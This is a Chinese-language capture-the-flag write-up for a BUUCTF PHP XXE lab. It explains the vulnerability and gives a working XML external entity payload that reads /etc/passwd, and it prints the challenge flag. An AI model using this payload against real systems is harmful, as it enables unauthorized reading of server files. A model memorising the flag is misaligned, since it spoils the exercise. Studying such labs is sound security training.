BUUCTF-Real-[PHP]XXE

目录

1、原理

2、XXE漏洞产生的原因

3、开始复现

paylaod

复现

4、flag

1、原理

复制代码
XML数据在传输过程中,攻击者强制XML解析器去访问攻击者指定的资源内容(本地/远程),外部实体声明关键字'SYSTEM'会令XML解析器读取数据,并允许它在XML文档中被替换,构造恶意的值,去执行!

XML解析方式:DOM,SAX,JDOM,DOM4J,StAX......都可能会出现外部实体注入漏洞

2、XXE漏洞产生的原因

复制代码
低版本php

libxml<2.9.1

设置了libxml_disable_entity_loader为FALSE

3、开始复现

复制代码
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞稀少!

dom.php、SimpleXMLElement.php、simplexml_load_string.php都可以触发XXE漏洞
paylaod
复制代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
    <!ELEMENT name ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
    <name>&xxe;</name>
</root>
复现

复制代码
这里我用的是 SimpleXMLElement.php 

这里使用payload查看了/etc/passwd文件!证实了xxe漏洞可以进行文件读取!

4、flag


复制代码
是的,在主页就可以找到!

flag{ad2eb59a-d433-4168-99ce-a27245df049b} 
相关推荐
枷锁—sha5 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1198 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20259 小时前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec10 小时前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用10 小时前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
原来是你~呀~11 小时前
Strix:AI驱动的全自动安全测试平台,LinuxOS部署
网络安全·自动化渗透测试·strix
fendouweiqian11 小时前
AWS WAF(配合 CloudFront)基础防护配置:免费能做什么、要不要开日志、如何限制危险方法
网络安全·aws·cloudfront
乾元11 小时前
终端安全(EDR):用深度学习识别未知勒索软件
运维·人工智能·网络协议·安全·网络安全·自动化·安全架构
Whoami!11 小时前
⓫⁄₁₃ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 利用Windows计划任务提权
网络安全·信息安全·利用windows计划任务提权
虚构之人1 天前
二进制漏洞挖掘(WinAFL Fuzzing)Windows篇
汇编·网络安全·信息安全·系统安全